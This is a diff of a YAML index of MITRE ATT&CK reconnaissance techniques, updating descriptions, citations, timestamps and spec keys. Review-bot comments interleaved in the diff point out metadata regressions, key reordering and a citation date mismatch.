external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
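Review bot: this hunk deletes `x_mitre_data_sources` ('Internet Scan: Response Content'), `x_mitre_is_subtechnique: false` and `x_mitre_version: '1.1'` with no `+` counterpart in view, while the added `url:` and `object_marking_refs` lines look like keys relocated from elsewhere in the object; unless the reordered object re-emits those three keys above this hunk, the technique loses its data source, sub-technique flag and version. Compare the parsed YAML (key set per object) rather than the text before merging, and pin the dumper's key order so relocations stop appearing as delete/insert pairs.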
@@ -91447,7 +92124,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
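Review bot: `modified` moves backwards here, from 2022-04-25T14:00:00.188Z to 2021-04-15T03:48:37.628Z, and the same regression recurs in the later hunks for T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006 and T1591.002. The old value is the identical batch stamp on every one of them, so the new, distinct timestamps look like the objects' genuine last-modified times from the source bundle; confirm that is the intent and state it in the commit message, because any consumer that syncs on `modified` will read this as a rollback.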
@@ -91463,8 +92140,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
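Review bot: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are both removed from T1596.003 with nothing replacing them, whereas other hunks in this patch (T1590.002, T1594, T1595.002, T1593.002) bump `x_mitre_attack_spec_version` to 3.2.0 and drop only `spec_version`, and T1596, T1589.002 and T1598.004 keep their `x_mitre_attack_spec_version` untouched. `spec_version` is a required common property on STIX 2.1 objects, so if this index is meant to remain loadable as STIX it should stay; if the generator intentionally strips it, it should do so uniformly and never remove `x_mitre_attack_spec_version` outright (the same double removal appears on T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006 and T1591.002 below).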
@@ -91486,7 +92161,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -91502,8 +92177,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -91531,7 +92204,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -91547,33 +92220,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
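Review bot: the substantive changes in this hunk are three: the comma after "DNS" is dropped so the sentence reads "DNS MX, TXT, and SPF records", a new paragraph on AXFR zone transfers against misconfigured servers is added with three new citations (Trails-DNS, DNS-CISA, Alexa-dns), and `x_mitre_version` goes from '1.1' to '1.2'. Everything else (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_platforms`, `x_mitre_is_subtechnique`) is the same key deleted and re-inserted at a new position. Every new `(Citation: ...)` needs a matching `source_name` under `external_references`; the following hunk supplies all three, so that is satisfied, but sorting keys in the dumper would make a version bump like this show only content.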
@@ -91587,18 +92260,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
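Review bot: the new DNS-CISA entry dates the alert "(2016, September 29)" but its URL path says `/alerts/2015/04/13/`; one of the two is wrong, so check the CISA page and correct the description or the URL before merging. The Trails-DNS entry pointing at a web.archive.org snapshot is the right call for a blog that has since moved, and the Sean Metcalf entry switching to x.com with a refreshed retrieved date is consistent with that.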
@@ -91619,7 +92303,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -91635,39 +92319,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
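Review bot: the T1594 description switches from a `|-` literal block to a double-quoted scalar with `\n\n` escapes, and the quoted form ends with a trailing space after "(Citation: Register Robots TXT 2015)" that becomes part of the stored string, which the old strip-chomped `|-` form would never have carried. Normalise the dumper so descriptions stay literal blocks (and trim trailing whitespace) so that the real text change, the new paragraph on hidden directories, sitemap.xml, robots.txt and Wordlist Scanning, is reviewable instead of buried in re-wrapped lines; the `id`, `type`, `created`, `created_by_ref` and `external_references` deletions here are relocations that reappear in the next hunk.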
@@ -91675,13 +92357,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
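Review bot: `x_mitre_version` '1.0' to '1.1' and the two new `external_references` entries (Perez Sitemap XML 2023, Register Robots TXT 2015) match the citations added to the description, so the content side is consistent. The remaining delta is churn: `url` and `external_id` swap order in the mitre-attack reference, the existing keys are re-emitted after `x_mitre_data_sources`, and `revoked: false` is materialised; if `revoked` is meant to be explicit now, it should be written for every object in the file rather than only those touched by this sync.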
@@ -91706,7 +92416,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -91722,8 +92432,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -91745,7 +92453,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -91761,8 +92469,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -91788,7 +92494,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -91806,8 +92512,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests:
- name: Enumerate PlugNPlay Camera
@@ -91828,7 +92532,7 @@ reconnaissance:
'
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -91884,7 +92588,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
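Review bot: the ACSC Email Spoofing URL is replaced with a web.archive.org snapshot but "Retrieved October 19, 2020" is left unchanged, while the OPM Leak entry in the T1589 hunk further down updates both the URL and the retrieved date together; pick one convention (the retrieved date reflects when the archive snapshot was verified) and apply it in both places.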
@@ -91935,7 +92639,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -91956,7 +92659,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -91972,8 +92675,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -91995,7 +92696,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -92011,8 +92712,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -92034,7 +92733,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -92050,12 +92749,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -92095,8 +92792,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -92141,11 +92838,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -92185,9 +92881,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -92249,7 +92944,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -92275,7 +92969,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -92296,8 +92990,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -92362,7 +93054,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
